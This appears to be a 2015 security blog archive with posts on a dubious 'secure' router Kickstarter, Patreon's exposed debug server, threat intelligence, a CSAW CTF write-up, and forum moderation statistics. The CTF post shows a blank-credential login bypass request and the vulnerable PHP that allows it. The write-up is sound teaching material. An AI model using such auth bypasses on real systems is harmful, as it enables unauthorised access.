The simple reality is that almost anything can be cracked/hacked if enough effort is put in and over the years various standards (remember the heartbleed bug?) contained, in hindsight, vulnerabilities.
So to our knowledge, the encryption we use in Veiltower is secure! That's until one day we, and many other Access Point providers that employ the same encryption, are proven wrong.
For the techs:
VPN: Strong Swan IKEv2
This of course after this tweet was made at me:

Needless to say it started quite the Twitter conversation so I am going to condense everything I know about them and additionally opine on the matter.

To start off here, no product no matter its claims can go and say that what they do and or provide is 100% secure and is immune to breaches. Anyone who makes such a claim is either being intentionally deceptive or has zero clue about what they're talking about. In this case, I think that's more of the latter as based on the background of the individual leading this project, as he does not appear to have ever worked on anything cyber security-related.

Veiltower (also known as Veil Systems) has a bit of a history and this is not their first Kickstarter either. It has since been removed but did manage to create a PNG mirror of the campaign draft which was penned around November 2014. They did tweet aggressively leading up to the date they expected to launch everything but for some unspecified reason, Kickstarter did not accept the submission so they promised to regroup and launch again later in the year.

However, after the last tweet, they made no quip about the Kickstarter campaign and just proceeded to share videos that they had already made. Additionally, the product was slightly different than what we are seeing now as they were also promising NAS functionality and an IP camera in addition to the "security" features we're seeing today.

Physically the products are similar except that there is a glowing, device shaped like a bowling pin that would have had the IP camera at the top. The campaign however appears to provide more details on the inner guts the device which is something I found lacking in the current campaign.

They're also providing the specifications in this old campaign.
Which again is sorely missing from the campaign.

However, something didn't add up: how is the PCB larger than the above disc in the guts image? If we look at a photo of the rear of the unit, you'll notice that the device doesn't even have ports that match the board.
This sort of reminds me of the Sever thing because it was revealed to me in conversation with some people close to the project that the board didn't match the case itself. What's going on here? Well without details on the specs of the unit in the current campaign, I guess we'll never know.

One thing to add: I call this a "misleading plastic jungle of deception" for good reason: they make the following claim about the antenna design:

A friend of mine is an avid ham radio operator and he informed me that the antenna slant wouldn't be enough to incur a polarization shift, meaning that the benefit from this design would be non-existent.

In any event, based on the hardware details from the previous Kickstarter and the lack of details in the current, it doesn't really bode well for this device at least from a physical standpoint. Any claims about its abilities to improve your overall Internet experience will be exaggerated at best.

Perhaps it's worth learning a bit about who's behind it: really there is one but it seems like there is quite a bit of discord going on behind the scenes as evident in these tweets.

I am guessing that after the exchange had started earlier (the crypto one from earlier was by this "social media guru"), Edsard Ravelli, the founder or leader behind this project decided to get involved and effectively sack the person behind the Twitter account--it should be assumed that the 802.1x encryption remark was made by the removed individual. I think that it is a bit fair to talk about the person behind this project.

Edsard hails from Amsterdam and appears to have been involved with the project from the start. He has claimed via his LinkedIn to once have been CEO and Founder of a company called DigiNext, but left in Autumn 2014, a year and a half after founding Veil Systems--I was not able to procure details on what happened with DigiNext but I can safely tell you that their website has a lot of broken links. Additionally he also has a software patent to his name, depicting some sort of update mechanism that reeks of similarity to every other software updater out there.

Veiltower mentions two other employees in the Kickstarter: Eric Stebel and Kris Caryl. Eric is cited as being the "Lead Designer" for the project, but judging based on his website, he's likely involved in the creation of the physical case of the device and not the electronics itself--however I will admit that Eric has done some cool stuff. I was not able to get much in the way on Kris other than her being cited as a Veiltower's logistics person.

Noticed something peculiar? Not a single person with an information security, software development, or hardware design background is cited. And here they are making claims about having a product that is 100% secure.

Of course, Edsard was okay in citing that it was okay to claim this because he's trying to lay it out to the laymen:

Edsard's excuse here is that it's acceptable to lie in the Kickstarter because he's trying to "appeal to consumers who [are] technology illiterate". By that logic, Volkswagen should be off the hook because consumers wouldn't notice the difference between the government-mandated emissions testing and "real world situations".

He continues to say that he had details posted on Facebook weeks before with over 5,000 followers where nobody made a quip about the claims. This is completely idiotic to claim and I am not even going to entertain the idea of writing here about why.

Going back to employees, Veiltower has gone out of their way to hire freelancers using Elance. Since April 2014, they have spent $38,002 USD across 29 different freelancing job requests--or about $1,300 on average per request. In contrast to their $250,000 goal on Kickstarter, the money spent on Elance would account for 15% of what they need to raise. How much is Edsard paying himself, Eric, and Kris? At a minimum, if these two have worked a year for Veil Systems at a wage of $8.12/hour, they'd each account for $16,952 ignoring things like sick days or other labour aspects. Times two, that's 14% of the campaign costs, meaning that around 30% is just for labour--this is a huge assumption too.

It should also be noted that none of the freelance requests were for anything technical and appeared to be solely marketing-related.

There's also no indication that there are other employees with Veil Systems as the name does not link to any other employees on LinkedIn other than Edsard himself.

One of the rewards is a white Veiltower for 1,999 people at a cost of $159. To meet that goal of $250,000, they need to get over three-quarters of that amount in order to cross that threshold required for a Kickstarter payout. But makes me wonder: does $250,000 cover all the salaries and development costs incurred?

If this was a product that was worth funding, a Kickstarter campaign would have not been ever needed. I tend to believe that the vast majority of campaigns out there are for ideas that are not marketable at all and just pander to a niche market. There are exceptions to this rule but it's a very short list of them.

Edsard has claimed that tomorrow he'll have some answers so we shall wait and see!

Friday, 2 October 2015

How Patreon made themselves a hole

As you might have heard, Patreon was breached and had its database and code dumped on the Internet. Canary has a copy of all e-mails and they are now all searchable.

I wrote this elsewhere, but this is how Patreon created a problem for themselves.

It's pretty easy to enable debug within Werkzeug but it isn't enabled by default. It's also not by default listening on "" but rather instead by default "".

Here's exactly what they did in the code (this is straight from the dump):
    web_app.debug = patreon.config.debug
    web_app.run('', port=args.port, use_reloader=False)
Then in the patreon.config.debug string, it had a true statement:
debug = True
Whoever enabled this server wouldn't have fed arguments to enable it as it was hard-coded into the application. All someone had to do was just type "python patreonweb.py" and the server would be ready to go with debug-mode enabled.

Detectify Labs wrote a blog entry and linked to a previous one of mine. Don't enable debug on Internet-facing servers and if you can help it don't enable it to listen on "" either.

Thursday, 1 October 2015

Threat Intelligence (is|can be) (useless|useful)

One of the interesting side-effects of SIEMs becoming popular in organizations is the rise of threat intelligence. Threat intelligence is really nothing new as it has existed since the mid-90s in the form of DNS Blackhole Lists (DNSBL) to combat spam. Today, we're seeing it used to not only identify spam but to also identify infected hosts belonging to botnets, machines identified belonging to less-than-reputable ISPs, and much more.

However, I've struggled with the usefulness or uselessness of this data. At the organization I work at, we're using some free threat intelligence data that is as described really useful but in practicality is very difficult to utilise because of the fact that in order for us to sift out the useful tidbits, we have to filter out the noise.

A prime example of a useful list that is littered with noise are lists of Tor exit and entry nodes. This is very useful data to know one can detect the use of these nodes quite quickly and then perhaps determine if there is an infected machine or inappropriate use. However, the data becomes useless when these Tor nodes (smartly) add themselves to NTP pools and these machines have misconfigured software that uses an NTP pool instead of whatever is set within domain policy. The solution is of course to fix your domain policy but then there may be other pitfalls that may arise as these nodes may just adopt something else to obscure their purpose.

Another example of where I find threat lists useless is that some groups will just place numerous honeypots and sensors across the globe and then use that to collect information on which machines are misbehaving and where they are attacking. A good example of such a setup would be with IP Viking's Norse map which looks like something ripped out of a remake of Wargames.

The problem I have with this approach is that it's like making yourself a member of as many Block Watch groups as possible. Sure. You're going to know which neighbourhood is more at risk than the other and you might even know who the perpetrators might be, but is it going to be useful to know this as someone not belonging to any of these Block Watches for your neighbourhood located in Seattle when the incident happened in Mumbai? Yeah. You'll mark that IP or IP block as malicious, but is it really a true concern?

Companies will sell this sort of information at ridiculous rates too. One company I had the pleasure of being on the phone with wanted to offer such data at a rate of $150,000 USD per year. That's a six-figure value for a constantly updating list of IP addresses. The data isn't really verifiable either as they depend on their own sources and purportedly say that whatever they're seeing is a "threat".

And that is just it: what constitutes a threat to your network and will threat intelligence provide you with anything of value? Is it really worth spending $150,000 USD per year on threat intelligence that may or may not be of value?

I'm going to toot my own horn here and say that the type of threat intelligence that these lists provide is more or less useless outside of perhaps the Tor example and perhaps mail reputation--I can save the latter for another rant.

With Canary (name soon to be retired), I don't mark discoveries found within the database as a threat--in fact, I avoid the phrase "threat intelligence" entirely on the site but that is likely to change. It's better to identify a threat on your own rather than rely on some third-party to do so. If your IP block, company hostname, or perhaps a hash with your own special salt shows up in the service, it's up to you to determine if it is worth investigating. At that point, the threat intelligence could actually be potentially useful.

Your security team should be making a decision on what is a threat and then reacting appropriately based on your response plan. Relying on a third-party to determine a threat is going to slow you down and eat up resources that otherwise may be better suited for other things.

When you look at the aforementioned Rolls Royce-costing service, you're going to get a list of IP addresses that you should look out for. It may be useful because maybe you'll just go and block those addresses from touching your network or maybe you'll sniff around your firewall logs to see if an address popped up before, but at the end of the day you're dealing with potential red-herrings and all because you're reacting to a situation in Mumbai when you're all the way in Seattle.

I don't really hate threat intelligence services per se like my example, but I at the same time struggle with finding the value in them. It is useful to know what sort of malicious activity is going on the Internet, but it can be useless to make decisions within your enterprise based on them.

Tuesday, 22 September 2015

CSAW CTF 2015 - Web 200 in two steps (using PHP's awfulness)

Some friends and I participated in this year's CSAW CTF under the name "Northwest Beer Drinkers". We placed 89th out of a total of 1,100+ teams, so I guess we can boast about being in the top-100 this year (woo). Sadly I couldn't participate myself too much this year as I had a family gathering to attend to, but I did spend some time early on and managed to solve Web 200.

Web 200, or "Lawn Care Simulator", was a simple web application that plays on the joke about "growth hackers". It was written to look like it was PHP-based, complete with a login page, registration form, and a suggestion that you join "their company". It definitely was quite tongue in cheek and they even went out of their way to make the grass grow in the blue square if you pressed the "grow" button.

When you attempt to login, it hashes the password field before sending off the form. This is done via an embedded JavaScript that makes use of the MD5 function in the CryptoJS library. The code executes as follows:

function init(){
            document.getElementById('login_form').onsubmit = function() {
                var pass_field = document.getElementById('password'); 
                pass_field.value = CryptoJS.MD5(pass_field.value).toString(CryptoJS.enc.Hex);

The registration page also refuses to let you sign up for an account, citing that it is currently in "private beta". It tries to play a trick on you in the form that it's looking for a hash value from the initial page, supplied by an improperly placed Git repository (which is important to note for later in this writeup), but I couldn't find a way to make use of this hash in the form, so I decided to attack the login mechanism instead since it was doing some weird hashing before sending the form off.

And this is where we sort of quickly solve the problem.

I decided to see what would happen if I just logged in with no credentials at all using Python Requests. The intention here was to see what sort of error would be produced and then use that to solve the problem. However, it sort of went sideways...
>>> import requests
>>> data = { 'username': '', 'password': '' }
>>> r = requests.post('', data=data)
>>> r.text
u'<html>\n<head>\n    <title>Lawn Care Simulator 2015</title>\n    <script src="//code.jquery.com/jquery-1.11.3.min.js"></script>\n    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> \n    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" rel="stylesheet"></link>\n</head>\n<body>\n<h1>

As we can see, this worked. At the time when the flag was revealed, I was not 100% certain that this was an intentional way to get the flag but while reviewing my notes and other information, I became conflicted.

If we go back to my remark about the Git repository, it was the repo for the entire source code to this challenge. And as it turns out in another write-up, it was key in solving the challenge for that person.

I did grab the source code from the challenge and took a look at why I was successful with fewer steps.
    require_once 'validate_pass.php';
    require_once 'flag.php';
    if (isset($_POST['password']) && isset($_POST['username'])) {
        $auth = validate($_POST['username'], $_POST['password']); 
        if ($auth){
            echo "<h1>" . $flag . "</h1>";
        else {
            echo "<h1>Not Authorized</h1>";
    else {
        echo "<h1>You must supply a username and password</h1>";
So now we know it uses validate function from validate_pass.php, so let's examine that to see why this worked.

function validate($user, $pass) {
    require_once 'db.php';
    $link = mysql_connect($DB_HOST, $SQL_USER, $SQL_PASSWORD) or die('Could not connect: ' . mysql_error());
    mysql_select_db('users') or die("Mysql error");
    $user = mysql_real_escape_string($user);
    $query = "SELECT hash FROM users WHERE username='$user';";
    $result = mysql_query($query) or die('Query failed: ' . mysql_error());
    $line = mysql_fetch_row($result, MYSQL_ASSOC);
    $hash = $line['hash'];

    if (strlen($pass) != strlen($hash))
        return False;

    $index = 0;
        if ($pass[$index] != $hash[$index])
            return false;
        # Protect against brute force attacks
    return true;
While my PHP is not up to snuff, it should at least from what I understand here have came up with no results unless the database itself had a row that was completely blank for both the hash and username field. If the result variable was not able to be created then it should have died outright, but it was able to fetch a row and feed it into the line variable.

In any event, the solution was not to ram it with a bunch of requests but to just post a blank username and blank password. Whether or not this is the official solution I am not 100% sure.

Edit: PHP is an awful language

I had a chat with a friend of mine (pr0zac) who knows PHP better than me and he pointed that that mysql_fetch_row returns "false" if no rows are found. What likely happened here is that SQL failed to return any rows but the query technically succeeded so mysql_query returned successfully.

Then mysql_fetch_row returned "false" when it executed and then strlen reading of that made the result "null".

After all that, it then just passes the check as it remains "null" after hashing and returns "true".

PHP is fucking awful.

Thursday, 10 September 2015

A look at Something Awful's moderation by the numbers

Something Awful has been on the Internet for over a decade and a half. In that time, it has been responsible for many aspects of Internet culture. I myself have been on the website's forums since December of 2000, so I've seen a lot of stuff come and go.

One aspect of the forums that is unique when you compare it to other Internet communities is that it keeps a public ledger of all of the punitive actions made by moderators and administrators to the site's users. This was implemented in 2004 and it has been kept since.

During an attempt to get over some jet lag, I decided to see what sort of numbers could be retrieved from the "Leper's Colony" which is the aforementioned ledger. After some attempts, I managed to download the data and then compile it into JSON which will be provided after I finish digging through the information.

I've also crunched some numbers and made pretty graphs to see how the site has behaved since the ledger was started. I'll start with the numbers in this entry and then provide some pretty stuff in the next.

No data outside of the Leper's Colony was retrieved other than a count for total users.

There's a lot of information you can gleam from this information including seeing how much involved Richard "Lowtax" Kyanka has been throughout the years and even how much money accounts can cost.

Base Statistics

The ban data covers all moderator and administrator data from August 7th, 2004 through to September 9th, 2015. During this time there were 136,845 events, meaning that on average there were 33 to 34 events per day.

When the data was compiled, there were approximately 193,000 accounts--this value fluctuates so we're going to leave it at this. Additionally, there are three punishment types marked in this ledger; they are ban, permabanned, and probated.
This table breaks it down by the numbers:


Based on the unique values, this means that around 18% of all users have had their accounts probated for a period of time, 9% have been banned, and about 1% have been permabanned entirely. The numbers also tell us that less than 4% of permanent banishments are not really all that permanent.



One aspect of the Something Awful forums is that temporary banishments (and not-so-temporary) are given quite frequently. Users that receive these probations are able to view the forums and send private messages, but they would not be able to post any new threads or reply.

Probations can be given one of two ways: either a moderator directly probates someone for whatever reason or the user posts a thread that gets removed ("gassed") which results in a 15 minute inability to post--however the latter does not end up on the ledger.

The first reported probation in the dataset was on September 27, 2004, and the infraction was "grasshopper leeching in BYZT".

The following table shows the length of a probation and the number of them given.

<6 hours36 hours22,095
12+ hours6,2801 day34,895
3 days24,0501 week13,607
2 weeks11 month3,227
>1 month2100,000 hours192

For the last one, 100,000 hours is about 11.5 years. It's given out periodically for those who may invoke the ire of an administrator who decides that it's much more humourous to just remove them for a decade. The first person to suffer this got the punishment on May 8th, 2005, which means that on October 4th 2016, or about a year from now, that account will be able to post once again--the account has not posted since being probated.

The total number of probation hours given would add up to just slightly over 3,000 years.


Bans are as they described: you are removed from the forums if you're found to be in violation of the rules or you've been probated so many times that a message needs to be sent.

Unlike many other websites such as Reddit or Digg, Something Awful does require you to pay in order to sign up. This hasn't always been the case, but accounts registered past late 2001 are typically paid at a rate of $9.99 USD. Numbers are hard to determine, but at the time before paid accounts became a part of the forums' operation, there were about 20,000 users, meaning that from just account registrations alone, around $1.7 million has been paid by new users. This could be impressive if it weren't for the fact that this is over a span of 14 years, meaning that it would just be $100,000 per year if it to remain consistent.

However, unique to Something Awful is the ability to pay for the ability to return to the forums. With exception to a permanent ban, all one has to do to return is pay the $9.99 fee and they'll have their account back--there is one catch: if you have any upgrades which too also cost $9.99, you'll have to pay for those upgrades once again too.

And it has worked. Accounts have re-registered several times as indicated by the ban data itself. Here's a table that breaks down the ban counts and how many unique users per count.

# of bansCount# of bansCount# of bansCount# of bansCount

As you can see, it can get quite impressive, but it should be kept in mind that if someone does get banned that they won't necessarily come back. However, multiple bans does indicate that the person has at least paid $9.99 once to return. If one were to assume that everyone has paid to come back, Mr. Kyanka would have raised about $240,000 from re-registrations alone.

One user who takes the top with 35 bans actually has more: the person in second place is the same user, which means the user has been banned 66 times, or has contributed at least $660 to Something Awful.

Or maybe they're not the top-most. Another user had registered 77 times under different but similar aliases, meaning they've spent almost $770.

What this speaks of is that you're not going to get rid of all problematic users by banning them, but it does mean that you can at least get some compensation for having to put up with them.


This account punishment is as it reads: a permanent ban. As mentioned earlier, some accounts do get the permanent ban lifted: it appears to be about 3.5%.

To break it down, 2,307 accounts have been permanently banned once. For accounts permabanned twice, it's at 73. Accounts permanently banned three and four times are both at 3.

It should be kept in mind that some accounts permabanned once may also be twice or more as well as they may be registrations under a different name.

Coming up...

In the next entry, I'll show pretty things in graphs. This one will take a bit longer than a few days but it should be fun.

Monday, 7 September 2015

Geotrust/Symantec has revoked all SSL certificates for .PW TLD domains

I just came off of vacation and had this show up in my e-mail regarding some problems with Canary:
Good morning Colin,
I hope your weekend was awesome.
Just a quick email to let you know that I am having issues with a possible certificate problem on Firefox, chrome, ie and even edge.
It works fine on safari on an iPad.
Needless to say I initially passed it off as someone having their client not configured correctly or running some outdated software (I really should avoid having these biases but I digress), but just as a sanity check, I decided to take a look.

Being that I didn't revoke the certificate myself, I reached out to the reseller that issued the certificate and had this relayed to me:
Reseller rep.:
We regret to inform you that certificate [number] for www.canary.pw domain has been revoked by the Certificate Authority due to the site being flagged as potentially containing malware in a recent site scanning by Symantec (owner of GeoTrust). Unfortunately we were not warned of the upcoming revocation, so we apologize for any inconvenience that this may cause.


Reseller rep.:
As per our check with Symantec, they will no longer be issuing SSL certs to .PW domains. You are advised to remove the SSL certificate from the server to avoid security errors related to a revoked certificate.
I was not happy to read this, but my reseller was awesome enough to issue me a refund so I could go ahead and just switch the certificate to another provider. There is no malware on Canary to say the least so the statement by Symantec is irrevocably false.

But here's the thing: why did Geotrust just go ahead and revoke the certificates for all .PW domains without any warning? Why did they believe that this was the best course of action and why did they decide to put domains at risk? It is because of these questions that I cannot recommend using them as a certificate authority.

Geotrust has done a great job demonstrating the problem with certificate authorities: they're closed organizations that you cannot put any trust into.

Wednesday, 26 August 2015

What's in a name? Retiring the name "Canary"

Almost three years ago, I started on a project to retrieve data from various sources and process them with the idea of allowing those to know when data has been compromised via alerts or just searching. After the Ashley Madison data hit the Internet last week, I had more searches in one day than I had in the entirety of the project up until then.

Canary has gotten more popular and has received more data since its start in March 2013. Last year, it hit a milestone of one million total samples. And as time has gone on, I’ve realised two things about the service that need to be changed.

The first one is the obvious: Canary has been getting slower as it has received more data and the results are becoming less clear. When I first developed the application, my knowledge of databases and efficient search queries were quite limited even though I was eager to make use of these tools. Having learnt some things from other projects I am engaged on, I am now almost complete in rewriting its backend and migrating to a new database engine too. When it is ready later in the autumn, I’ll be able to discuss this in further detail.

Now, what is the second one you might ask? It needs a name change.

Originally, Canary had a few prototype names: the working name was “DataAlert” and its codebase was referred to as “ODLDB” or “Online DataLoss DataBase”. After getting the software to work as expected, the name “Canary” was adopted after an earlier project of mine, “Avivore”, which was a tool for finding phone numbers and other personal information on Twitter. Internally, I still refer to the software as “ODLDB” even though its components are all named after specific birds.

The problem I am running into now is that there are far, far too many applications and services on the Internet using the name “Canary”. To make matters worse, there have been several other “Canaries” including one that practically did the same thing as the service I run today and another that had a logo so similar to mine that I considered speaking to a lawyer to see what my options were to prevent the sale of its service within North America.

Four services or projects so far have adopted the name “Canary” in the information security sector since I started Canary in 2013. One is a piece of hardware that behaves as a internal network honeypot, another is a webcam for home monitoring, one does practically the same thing as what I offer, and another is supposed to detect changes in SSL certificates. In three of these, I can remain confident that those who went and adopted the name did little to no research on the name and just went and slapped it on--the camera product came out a month or so after I announced the service so I don’t have the same sentiment.

It has gotten to the point where I have been getting e-mails about these other Canary-named services that have nothing to do with me. These e-mails happen at least once or twice per week and usually I just respond with, “these are not the canaries you’re looking for”.

Having said all that, I am not a fan of being litigious or aggressive towards others especially since the space where “Canary” is being used as a product name is becoming quite crowded and the energy and capital I’d have to spend to fight for it would exceed that of simply renaming the service and redirecting traffic to a new domain. I am also a person that prefers to build bridges with people and the other Canary-named services are individuals and groups I’d personally rather be amicable with upon anything else. Additionally, I don't think the adoption of this name by others was intended to undermine me or anything and that instead I think it's just a lack of forward-thinking.

With the release of a new version of the software will come a new name for Canary. I have several candidates for names at this time but I will be doing my research. What I do ask for you as the reader is that when you name a project, consider just doing a simple search on Google or something to ensure that you won’t be stepping on toes or making people who’ve already invested some time and energy into it.